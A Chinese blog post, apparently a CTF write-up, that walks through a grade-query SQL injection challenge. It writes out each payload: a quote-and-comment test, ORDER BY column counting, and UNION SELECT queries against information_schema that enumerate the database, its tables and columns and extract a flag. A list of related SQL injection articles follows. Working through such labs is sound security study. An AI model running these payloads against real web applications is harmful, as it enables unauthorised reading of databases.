成绩查询SQL注入方法

最新推荐文章于 2024-03-10 21:16:17 发布
最新推荐文章于 2024-03-10 21:16:17 发布
阅读量454 收藏 1
点赞数 1
分类专栏: sql注入 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44364851/article/details/112858725
版权

给的初始题目界面时这个样子
在这里插入图片描述
通过输入1' #发现有响应,判断应该是SQL注入问题
在这里插入图片描述
mysql语句中,order by m是指按照第m列从小到大排序,因此可以分别1’ order by 1#1’ order by 2#……直到报错为止,从6开始报错可以判断出一共有5列
在这里插入图片描述
mysql中database()user()用来获取数据库名称和数据库用户,因此通过union select来获取这两个信息,通过’ union select 1,2,3,4,5#,其中将database()user()放入1,2,3,4,5中的位置再看输出结果来判断每一列的输出位置,得出1列没有显示,2列是“ ”的成绩单,3列是语文成绩,4列是数学成绩,5列是英语成绩,因此可以将database()user()放在3,4,5列中获取
在这里插入图片描述
可以得到数据库名称为twosecu1_vuln_06数据库用户为twosecu1_vuln_06@101.133.142.188,接下来获取表名称,通过语句id=' union select 1,2,table_name,4,5 from information_schema.tables where table_schema='twosecu1_vuln_06' # 来获取,其中table_name是表名称,table_schema是数据库名称,information_schema用于存储mysql中所有数据库及数据库的行和列的名称,information_schema.table是数据库中表的名称,information_schema.column是数据库中列的名称
在这里插入图片描述
通过注入可以得到表名为flag,其中通过这个语句查询得到的表名并不是所有表名,要查询得到所有表名可以使用函数group_concat(),通过语句,id=' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='twosecu1_vuln_06' #获取所有表名
在这里插入图片描述
接下来获取表中的列,通过语句id=' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='flag' and table_schema='twosecu1_vuln_06' # 来获取,注意限定表名和数据库名
在这里插入图片描述
可以看到有两列idflag,很显然flag中的数据就是我们要的旗了,因此使用语句id=' union select 1,2,group_concat(flag),4,5 from flag #获取数据
在这里插入图片描述
拿到了旗

Soul百态
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入详解
m0_67392811的博客
06-12 5863
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入超详细
qq_57573970的博客
05-22 418
操作系统数据库名数据库用户数据库版本其他(网站路径等)
bugku 成绩查询sql
qq_63875498的博客
12-04 776
bugku 成绩查询sql
【CTF-web】bugku-成绩查询sql注入
Sankkl1的博客
08-17 584
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
一次简单的sql注入 bugku 成绩查询
jzw0831的博客
11-06 1118
一次简单的sql注入 bugku 成绩查询
PHP+SQL公共课平时成绩查询系统.rar
05-12
PHP中应避免SQL注入攻击,可以使用预处理语句或参数化查询。同时,密码应进行加密存储,防止数据泄露。 5. **文档与源码**:系统附带的详细文档将涵盖系统架构、功能模块、数据库设计、PHP代码解释等内容,方便用户...
成绩查询php源码.pdf
09-01
7. 安全性:源码中可能包含了安全措施,比如"safe.php"可能包含了防止SQL注入或XSS攻击的函数。`trim()`函数用于去除字符串两端的空白字符,而`webalert()`可能是自定义的弹窗警告函数,用于显示错误信息。 8. 错误...
php+mysql学生成绩查询
05-02
4. **安全性**:考虑到数据安全,系统需要防止SQL注入攻击,对用户输入进行过滤和转义。同时,密码应进行加密存储,确保用户信息安全。 5. **错误处理与日志**:系统需具备良好的错误处理机制,捕获运行时可能出现...
php+sql成绩查询系统.doc
最新发布
06-28
- **输入验证**:防止SQL注入攻击,确保用户提交的数据合法。 - **会话管理**:通过会话ID跟踪用户的登录状态,确保用户在有效期内可以访问系统。 #### 4. 系统设计 - **模块化设计**:将系统划分为多个功能模块,...
SQL注入类型与技巧
求大佬师傅带
09-01 4242
SQL注入类型与技巧
【万字长文】SQL注入全流程解析,零基础看这一篇就够了
m0_74131821的博客
03-22 2183
SQL注入简单来说就是前端没有对输入的数据进行过滤,同时后端也没有过滤,导致一些不合法的SQL语句可以执行,导致SQL注入
SQL注入查询注入
m0_61974571的博客
10-12 1732
如果使用config的认证方式,则直接进入后台,如果为http,可以进行爆破,最好不要开启phpmyadmin,或者在需要的时候再开启远程登陆,修改/opt/lampp/etc/extra/http-xampp.conf文件禁用远程访问。使用方法:https://blog.csdn.net/kikajack/article/details/80065753。上述语法主要针对mysql数据库,如果针对其他数据库,需要使用其他数据库的语法。3、Web页面中有两个SQL查询语句,查询的列数不相同。
Bugku成绩查询:一次简单的SQL注入过程
xhxtalent的博客
10-20 513
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单。
SQL注入渗透与攻防(七)之查询方式及报错注入
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-23 664
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显得原因可能时SQL语句查询方式问题导致,这个时候我们需要用到报错或者盲注进行后续操作,同时在注入的过程中,提前了解其中SQL语句可以更好的选择对应的注入语句。例如:后台管理里面删除文章删除用户等操作。例如:在网站应用中进行数据显示查询操作。例如:在网站应用中进行用户注册添加操作。例如:后台中心数据同步或者缓存操作。
SQL的联合查询注入学习
2301_80034711的博客
03-10 1022
SQL是操作数据库数据的结构化查询语句,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从而产生SQL注入。攻击者可以在事先定义好的查询语句的结尾上添加额外的SQL语句,从而对数据库服务器执行非授权的任意查询,获得相应的数据信息。4、分类:①GET注入注入点在URL中②POST注入注入点在POST提交的数据中③Head头注入注入点在请求头中①有回显注入(显错注入):执行语句后可以把具体内容反馈出来。
SQL注入详解
热门推荐
行者AI
09-16 1万+
现在大多数系统都使用B/S架构,出于安全考虑需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往会出现安全隐患,为了更好的保护数据泄露或服务器安全,为了方便的安全测试,便编写此文。 1. SQL注入简介 SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。下面以PHP语句为例作为展示: query="SE
成绩录入SQL语句 笛卡尔积 LEFT JOIN
小小的花园里面挖呀挖呀~
03-19 1804
select * from (select * from Student s,Course c ,(select distinct Year from Score) as y,(select distinct Term from Score) as term ) as dt left join Score s on dt.Studentid = s.Studentid and dt.Year =
SQL注入查询方式及盲注)
qi_SJQ_的博客
11-09 1587
很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作。 sql语句增删改查: 比如:insert注入可以用于用户注册时插入到数据库中。 ...
java制作输入学号查询成绩链接sql
05-25
注意,在这个示例程序中,我们使用了 PreparedStatement 来构造查询语句,并使用 setString 方法来替换查询语句中的参数。这可以避免 SQL 注入等安全问题。同时,我们使用 try-catch 语句来处理可能出现的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值